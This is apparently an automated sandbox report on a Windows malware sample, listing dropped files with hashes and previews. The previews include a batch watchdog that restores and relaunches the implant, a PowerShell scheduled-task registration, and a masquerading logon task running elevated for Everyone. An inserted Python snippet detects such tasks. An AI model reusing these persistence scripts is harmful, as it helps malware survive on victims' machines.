                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........>.'._.t._.t._.t.4.u._.t.4.ug_.t.4.u._.t.*.u._.t.*.u._.t.*.u._.t.'ct._.t...u._.t.4.u._.t._.ti_.t.*.u._.t.*.t._.t._gt._.t.*.u._.tRich._.t........................PE..L....*.f..........................................@......................................@.............................................h............~...Q......D*......p...............................@............................................text............................... ..`.rdata..`...........................@..@.data...PF...0...6..................@....rsrc...h............L..............@..@.reloc..D*.......,...R..............@..B........................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\OdiHmn3pRK.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):34973764
                                                                Entropy (8bit):7.999992711795488
                                                                Encrypted:true
                                                                SSDEEP:786432:R6DiHlJlatIRi7EorzN+IE7IFlqmC0o5MqDZOTtWB2:wDiFJlaKR8ECsp8lCb5MqFOZX
                                                                MD5:5BE06E99845606C85E3BD3BEABF20C2B
                                                                SHA1:99BA32BA05FBA7A16F0A227F23C7C50EC9CB632B
                                                                SHA-256:9DC8C2877D20A8D70121CD33C3088DE63ADA7FB87E02CD11E21F7618C0AD617C
                                                                SHA-512:EE93B79EB45753DB5AFA0D003AF35E508C218F216EA146D8EC4609403519DFBD4B9A52DEC2F6F21A08F2FA03A02B34BA173019E64147AC5F14C3605B8069667E
                                                                Malicious:false
                                                                Preview:..>.....x...@..(.....*.......B..........p..[....y...r...:**<5..F..?...S.......+lF.i.....c[K...P|.......]-L.Y..t.A8:..j.9#.U.+..O.;..{.g..P.......|@}gP....h~./~..\..P.....I.i...L./\?.kE...o"z.9..6........*.`.........../;.'Z......S.MM...a..-..l?H*...:bZ..G'.~..V.....hc...3....q..J.........<Wvj~>*t..M...3...L..D..u^..=P.....l.1..4..[.ds<D.s..k.cd..~b-.66'..Ae.Dh.S&...|..$......p;..p.~ni..T...6q7...Z.T....c.^b<... X.|.2f...!..~M..g...L=.~.Z.<[........N....c...iD...e.).g|.CA.{.S..%.uz}..M-. s.]....W.../?.k.....b..................fLR<+n..<.r'.W.i..j..%.F/^.1Q.-...X..V(S.....3...[}4....HG.{.....].@..0S._KA...oS<'.U<0..gLSD7...Q.A>9..A].O1.r:..|....`.....E..+,...5x...?.J......Z..).Z..{...u...fN.d..t)u..[..d.0 .of.q.4I..Fx..!1.v...oF9g.....{zP..`..%.......g5....h.....U=;M.ce.CW..G;'....=.cMC.i.Q..(.sD+k....@\H.....S.Ln.ym(c..d.+Q)v..H.;..G...]. ..A.oZ.-(....zecA..V0...X......I..Y..R...L"..*2.D.{.8..`.g..^.........9c'....n:QvO.........$..4...>..
                                                                Process:C:\Users\user\Desktop\OdiHmn3pRK.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):1028256
                                                                Entropy (8bit):5.41129017115742
                                                                Encrypted:false
                                                                SSDEEP:12288:gwrY4IECJHENxLp5S/rZn0YzNTNuF3/C/JDeS8mJhcVBNtg62KFPr:g8NqqUNTNuFvOh8mJw3662Aj
                                                                MD5:587E3BC21EFAF428C87331DECC9BFEB3
                                                                SHA1:A5B8EBEAB4E3968673A61A95350B7F0BF60D7459
                                                                SHA-256:B931C5686CC09B2183BBA197DC151B8E95CA6151E39FB98954352340C0B31120
                                                                SHA-512:FFAE2DAB5CAF16DC7DFD0A97A8FF6349A466BC57EE043D1AC4D53E011498E39B9A855295D10207BA578C6857ABEBD445D378E83AA2FF6EC247713D81B370D0CA
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.[.~.5.~.5.~.5..[6.p.5..[0...5..[1.g.5.1.1.o.5.1.6.i.5.1.0.!.5...0.}.5..[4.a.5.~.4.M.5...<.s.5......5.~....5...7...5.Rich~.5.........................PE..L......f...............".....p.......z............@.................................L.....@.................................pp..........Hd...........^...R...P...N......p...................@...........@............................................text............................... ..`.rdata..`x.......z..................@..@.data....=.......(...~..............@....fptable............................@....rsrc...Hd.......f..................@..@.reloc...N...P...P..................@..B........................................................................................................................................................................................................................................
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):1360
                                                                Entropy (8bit):5.405051374611953
                                                                Encrypted:false
                                                                SSDEEP:24:3eWSKco4KmZjKbmOIKod6emN1s4RPQoU99tXt/NK3R88bJ02iaEW3b5:uWSU4xympjms4RIoU99tlNWR832qab5
                                                                MD5:86DFAF94EFE31AC1960C77DDE14BB8A1
                                                                SHA1:89C9EC7BA3BAD4A8B8BD8556D41FE54664D83C71
                                                                SHA-256:9FE97B3EBF5C883DE01F0D59E47AD0ECE788D0FE6B9745F8B1E53974960C3F61
                                                                SHA-512:C7F5BE1F3DBAEEF2987239A1947697C4CE65127F233294D2DF259862C1F64EE85B38296CAB4C19605BA24D18514C02F501BDC8C637A0E5ED19692056480E93A7
                                                                Malicious:false
                                                                Preview:@...e...........................................................P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins
                                                                Process:C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe
                                                                File Type:XML 1.0 document, ASCII text
                                                                Category:dropped
                                                                Size (bytes):1893
                                                                Entropy (8bit):5.212287775015203
                                                                Encrypted:false
                                                                SSDEEP:48:c55XzDl4Q2ZbXL6Q0QFdOFQOzN33O4OiDdKrKsTLXbGMv:O5XzDl4Q2ZbGQhFdOFQOzBdKrKsTLXbV
                                                                MD5:E3FB2ECD2AD10C30913339D97E0E9042
                                                                SHA1:A004CE2B3D398312B80E2955E76BDA69EF9B7203
                                                                SHA-256:1BD6DB55FFF870C9DF7A0AAC11B895B50F57774F20A5744E63BBC3BD40D11F28
                                                                SHA-512:9D6F0C1E344F1DC5A0EF4CAAD86281F92A6C108E1085BACD8D6143F9C742198C2F759CA5BDFFAD4D9E40203E6B0460E84896D1C6B8B1759350452E1DE809B716
                                                                Malicious:false
                                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2006-11-10T14:29:55.5851926</Date>. <Author>Microsoft Corporation</Author>. <Description>????? AD RMS ?????????????????? Web ?????????,???????????</Description>. <URI>\AS AMD updata</URI>. <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>. </RegistrationInfo>. <Triggers>. <LogonTrigger id="06b3f632-87ad-4ac0-9737-48ea5ddbaf11">. <Enabled>true</Enabled>. <Delay>PT30S</Delay>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="AllUsers">. <GroupId>S-1-1-0</GroupId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerm
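The task definition previewed above is the persistence artifact written by the copy in C:\Users\Public: a logon-triggered task whose registration metadata reads as if copied from a built-in task (author Microsoft Corporation, a 2006 date, an AD RMS description) while its URI, `\AS AMD updata`, is not under \Microsoft\; its DACL grants Everyone (WD) read and execute, and its principal is S-1-1-0 (Everyone) at RunLevel HighestAvailable. The Python below is an added example, not part of the report or of the sample: it parses Task Scheduler XML and flags exactly those attributes. The first task XML inside it is reconstructed from the visible fields of the preview (the mis-encoded description is replaced by a placeholder and the <Actions> element, cut off in the preview, is omitted); the second, benign task is constructed for contrast.

```python
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Principal SIDs and SDDL SID aliases that mean "every interactive user".
BROAD_GROUP_SIDS = {"S-1-1-0": "Everyone", "S-1-5-11": "Authenticated Users",
                    "S-1-5-32-545": "Users"}
BROAD_SDDL_SIDS = {"WD": "Everyone", "AU": "Authenticated Users", "BU": "Users"}
EXEC_RIGHTS = {"FX", "FA", "GA", "GX"}  # file execute, file all, generic all, generic execute

# Reconstructed from the visible fields of the dropped file's preview (constructed for
# this example): placeholder <Description>, <Actions> omitted, no XML declaration.
SUSPICIOUS_TASK_XML = r"""<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2006-11-10T14:29:55.5851926</Date>
    <Author>Microsoft Corporation</Author>
    <Description>(mis-encoded description)</Description>
    <URI>\AS AMD updata</URI>
    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger id="06b3f632-87ad-4ac0-9737-48ea5ddbaf11">
      <Enabled>true</Enabled>
      <Delay>PT30S</Delay>
    </LogonTrigger>
  </Triggers>
  <Principals>
    <Principal id="AllUsers">
      <GroupId>S-1-1-0</GroupId>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
</Task>"""

# Constructed benign counterpart: Microsoft URI, SYSTEM at least privilege,
# no grant to broad groups, calendar trigger.
BENIGN_TASK_XML = r"""<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Author>Microsoft Corporation</Author>
    <URI>\Microsoft\Windows\Example\Maintenance</URI>
    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)</SecurityDescriptor>
  </RegistrationInfo>
  <Triggers><CalendarTrigger><StartBoundary>2024-01-01T03:00:00</StartBoundary></CalendarTrigger></Triggers>
  <Principals>
    <Principal id="LocalSystem">
      <UserId>S-1-5-18</UserId>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
</Task>"""


def _text(node, path):
    el = node.find(path, NS)
    return (el.text or "").strip() if el is not None else ""


def sddl_dacl_aces(sddl: str) -> list:
    """Return (ace_type, rights, sid) for each ACE in the D: part of an SDDL string."""
    dacl = sddl.split("D:", 1)[1].split("S:", 1)[0] if "D:" in sddl else ""
    aces = []
    for ace in re.findall(r"\(([^)]*)\)", dacl):
        parts = ace.split(";")
        if len(parts) >= 6:
            aces.append((parts[0], parts[2], parts[5]))
    return aces


def audit_task_xml(xml_text: str) -> list:
    """Flag the persistence-relevant attributes of a Task Scheduler XML definition."""
    root = ET.fromstring(xml_text)
    findings = []
    author = _text(root, "t:RegistrationInfo/t:Author")
    uri = _text(root, "t:RegistrationInfo/t:URI")
    if author == "Microsoft Corporation" and not uri.startswith("\\Microsoft\\"):
        findings.append(f"author claims Microsoft but URI {uri!r} is not under \\Microsoft\\")
    for ace_type, rights, sid in sddl_dacl_aces(_text(root, "t:RegistrationInfo/t:SecurityDescriptor")):
        right_codes = {rights[i:i + 2] for i in range(0, len(rights), 2)}  # two-letter SDDL codes
        if ace_type == "A" and sid in BROAD_SDDL_SIDS and right_codes & EXEC_RIGHTS:
            findings.append(f"DACL lets {BROAD_SDDL_SIDS[sid]} run the task ({rights})")
    for principal in root.findall("t:Principals/t:Principal", NS):
        group = _text(principal, "t:GroupId")
        if group in BROAD_GROUP_SIDS and _text(principal, "t:RunLevel") == "HighestAvailable":
            findings.append(f"runs for every {BROAD_GROUP_SIDS[group]} member at HighestAvailable")
    logon = root.find("t:Triggers/t:LogonTrigger", NS)
    if logon is not None:
        findings.append(f"logon trigger with delay {_text(logon, 't:Delay') or 'none'}")
    return findings


if __name__ == "__main__":
    for name, xml_text in (("suspicious", SUSPICIOUS_TASK_XML), ("benign", BENIGN_TASK_XML)):
        print(name, audit_task_xml(xml_text))
```

On a live host the same checks apply to the task XML under C:\Windows\System32\Tasks, or to the output of `Export-ScheduledTask`; the combination of a Everyone principal at HighestAvailable and a logon trigger is what makes this task fire, elevated, for whichever user logs on next.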
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):2290456
                                                                Entropy (8bit):6.607149462612304
                                                                Encrypted:false
                                                                SSDEEP:49152:hyT6UzfP7fyC5fJVOWsL6FpGgxv4v9c2Ut3n1gp0pci3YKLjX:hK6UzfP73RVOWmMZxvwc2Ut3n6p0pciV
                                                                MD5:4A55B0873DAD6B4F9506589C6B341D4E
                                                                SHA1:5231E7DF7BE7C3B1C145BDF2BC8E5E23C8540898
                                                                SHA-256:DFBD06B0B2C121153B0DE4B809778CEA1A43E754E6D18B254BA8902902850CF4
                                                                SHA-512:297F0A3F2442A2C70BF5828C0C60B228D043F2BF80D9305FF6F2AE15328040F7B5634D36529E0CAC53E90F084208A630B2C8E8C0C5C70B4E9A130B8FB3895C0D
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 65%
                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....cg...........!.........<......S .......................................`#...........@.................................3...h..... ..H............"..)... !..0.......................... b......p................................................text...}........................... ..`.rdata...^.......`..................@..@.data......... ..^..................@....00cfg........ ......L .............@..@.tls.......... ......N .............@....rsrc....H.... ..H...P .............@..@.reloc...0... !..2.... .............@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):315264
                                                                Entropy (8bit):6.663282350107098
                                                                Encrypted:false
                                                                SSDEEP:6144:rcaBfTrqYPy8brrIQYDW6AgoY7fJA3p+anDhDAOHlPzJD:rca48brrIQYDW6AgpAzjzJD
                                                                MD5:607336E586D1BD00DCF1CA7EED97A8DB
                                                                SHA1:1B10CCE801F12E277DEFD9D16FC3F4EEBCCE3344
                                                                SHA-256:A5DD0996B950D443A04F8589EAF7AEA16C9420D9B72D336F283F95DC74BFC79C
                                                                SHA-512:61A81D218090BDFAAADB6AA87C407984FDA14C62D98397817D9AAD1A0350E7C4E0A7FD884D71081EB15044CF0D06C1B9715C822DC50831A03D63EF66AEB2BEFA
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........>.'._.t._.t._.t.4.u._.t.4.ug_.t.4.u._.t.*.u._.t.*.u._.t.*.u._.t.'ct._.t...u._.t.4.u._.t._.ti_.t.*.u._.t.*.t._.t._gt._.t.*.u._.tRich._.t........................PE..L....*.f..........................................@......................................@.............................................h............~...Q......D*......p...............................@............................................text............................... ..`.rdata..`...........................@..@.data...PF...0...6..................@....rsrc...h............L..............@..@.reloc..D*.......,...R..............@..B........................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe
                                                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):814
                                                                Entropy (8bit):5.142435259685461
                                                                Encrypted:false
                                                                SSDEEP:24:NFW/WRW/WRWE3fzWcEbTCrfZKx31SIYaYZLZ6y:NFVRVRjvzmbTUZKx31SIYN/6y
                                                                MD5:AAB6A4CDD3F731F7EC6C98C2C6098787
                                                                SHA1:433BE51346E6A2A199B535BBC36CE252A61E34EB
                                                                SHA-256:EDEF7DA4A25E1EAEC7247ED23EED56D6ADA8518AA69C519AEEBE89131C7B52B4
                                                                SHA-512:67B20D585D59BFF57A84E467A9CF31D68FEA48C33592916822939189CC9F400D1378FBC311D9244371D9AB7F5BAA08EFC8D3B8682E22E7530B74F6C340364110
                                                                Malicious:false
                                                                Preview:@echo off..:CheckProcess..set "ProcessName=kwpswnsserver.exe"..set "ProcessPath=C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe"..set "BackupProcessPath=C:\Users\user\AppData\Local\Temp\\backup.exe"..set "DLLPath=C:\Users\Public\Bilite\Axialis\Microsoft.WindowsAppRuntime.Bootstrap.dll"..set "BackupDLLPath=C:\Users\user\AppData\Local\Temp\\backup.dll"..if not exist "%ProcessPath%" (.. echo Process file not found, restoring from backup..... copy /Y "%BackupProcessPath%" "%ProcessPath%"..)..if not exist "%DLLPath%" (.. echo DLL file not found, restoring from backup..... copy /Y "%BackupDLLPath%" "%DLLPath%"..)..tasklist /FI "IMAGENAME eq %ProcessName%" | findstr /I "%ProcessName%" >nul..if %ERRORLEVEL% neq 0 (.. start "" "%ProcessPath%"..)..timeout /t 30 /nobreak >nul..goto CheckProcess..
                                                                Process:C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):4
                                                                Entropy (8bit):1.5
                                                                Encrypted:false
                                                                SSDEEP:3:E:E
                                                                MD5:0C9E63B6CEC0627182663AE8FEB204CB
                                                                SHA1:3C251B930164EDBACA3519A07BE74218D40C5FC1
                                                                SHA-256:423E0328917025753AB3A5EBE7F7E85BAA34BC80A9E309CF2341F93756C387EF
                                                                SHA-512:1F203323637B6478AB2E1DEF2259AAA2B20EC19270182C59CBF7A31CDB852E7C9954BDA8EF9ABB417F03673774DC218E9506A8C1EA7EBA32F02C4F44F64FE13B
                                                                Malicious:false
                                                                Preview:8168
                                                                Process:C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe
                                                                File Type:ASCII text
                                                                Category:dropped
                                                                Size (bytes):151
                                                                Entropy (8bit):4.741657013789009
                                                                Encrypted:false
                                                                SSDEEP:3:41Ai+PBoAwnLFsI2FIERMJyjqLWAfXIhS/ytIEFMEQVGdAn:4yi+5dwnLFsI2F5KJy0fXnMFFQhn
                                                                MD5:AA0E1012D3B7C24FAD1BE4806756C2CF
                                                                SHA1:FE0D130AF9105D9044FF3D657D1ABEAF0B750516
                                                                SHA-256:FC47E1FA89397C3139D9047DC667531A9153A339F8E29AC713E518D51A995897
                                                                SHA-512:15FAE192951747A0C71059F608700F88548F3E60BB5C708B206BF793A7E3D059A278F2058D4AC86B86781B202037401A29602EE4D6C0CBAAFF532CEF311975F4
                                                                Malicious:true
                                                                Preview:$xmlPath = "XML??".$taskName = "????".$xmlContent = Get-Content -Path $xmlPath | Out-String.Register-ScheduledTask -Xml $xmlContent -TaskName $taskName
                                                                Process:C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Dec 27 11:09:07 2024, mtime=Fri Dec 27 11:09:07 2024, atime=Wed Nov 20 11:08:04 2024, length=1028256, window=hide
                                                                Category:dropped
                                                                Size (bytes):1061
                                                                Entropy (8bit):4.696775278947634
                                                                Encrypted:false
                                                                SSDEEP:12:8z+UrrC9RUlGIQgCICHqXYX/XMACmqIBGhSCg0zKxHS/xIiljAQtFkGAavExo449:8zfGFU+NTiKxczRAkve3qyFm
                                                                MD5:CBF65092DB5D1D066EC001BC7F7E9865
                                                                SHA1:749CA294D442EA245971977C72902285F8C506EA
                                                                SHA-256:A6EC2688B31AA2443AA361F403E95F4B0597BFE9E68C7C562C63C4947468306A
                                                                SHA-512:2FBBC4911FA862480998EE80C81F33CB19F45A50574EB864BD0E4E39FC011147C69C90C8F13DC8701982177D3851E912CE81C36B0D27492690CEB1B6D11E000A
                                                                Malicious:false
                                                                Preview:L..................F.... ....:[!XX..+.]!XX...G..D;...............................P.O. .:i.....+00.../C:\...................x.1.....CW;^..Users.d......OwH.Y!a....................:.....K...U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....|.1......Y"a..Public..f......O.I.Y%a....+...............<.........P.u.b.l.i.c...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.6.....T.1......Y$a..Bilite..>......Y"a.Y$a..........................UO%.B.i.l.i.t.e.....n.2.....tY.a .LINIT-~1.EXE..R......Y$a.Y$a.....+........................l.i.n.i.t.-.v.4...1...6...e.x.e.......V...............-.......U..............d.....C:\Users\Public\Bilite\linit-v4.1.6.exe..$.....\.....\.P.u.b.l.i.c.\.B.i.l.i.t.e.\.l.i.n.i.t.-.v.4...1...6...e.x.e..........v..*.cM.jVD.Es.!...`.......X.......642294...........hT..CrF.f4... ...T..b...,.......hT..CrF.f4... ...T..b...,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.........9...
                                                                Process:C:\Windows\SysWOW64\timeout.exe
                                                                File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                Category:dropped
                                                                Size (bytes):130
                                                                Entropy (8bit):4.10355589898397
                                                                Encrypted:false
                                                                SSDEEP:3:hYFRZARcWmFsFJQZ/ctXvY/4to/9uF8cttEfYhnQUqg2V:hYFRamFSQZ0lv5y/9JctESnQUql
                                                                MD5:B5228F46DF07DAF9DC514A2DC07078F3
                                                                SHA1:428D65EA0BA173ED7C2196C81CE993F94342419F
                                                                SHA-256:56D5B811DC01639CBD4530CD830F7CCD99FE1DF3B4FFD78F1FBB53AAA778B2E0
                                                                SHA-512:F67D29C9497E591EA93CED65EE45EA9A75D7F89D956CEBC2D995834BB5503AE91A9B3B716C19F66696292FE54AF70E7C6495C60599C66554CF76CBCA115AD2A4
                                                                Malicious:false
                                                                Preview:..Waiting for 30 seconds, press CTRL+C to quit .....29..28..27..26..25..24..23..22..21..20..19..18..17..16..15..14..13..12..11..10
                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Entropy (8bit):7.99996315828415
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:OdiHmn3pRK.exe
                                                                File size:36'618'436 bytes
                                                                MD5:11933d4b44331258739282e769ca4914
                                                                SHA1:dbd80d352bb11812af26421bd0668d2913e93eac
                                                                SHA256:ed319509508b44b3dd2a50c735c11c2bb7d29b753435b28ab40e3d08d376e46a
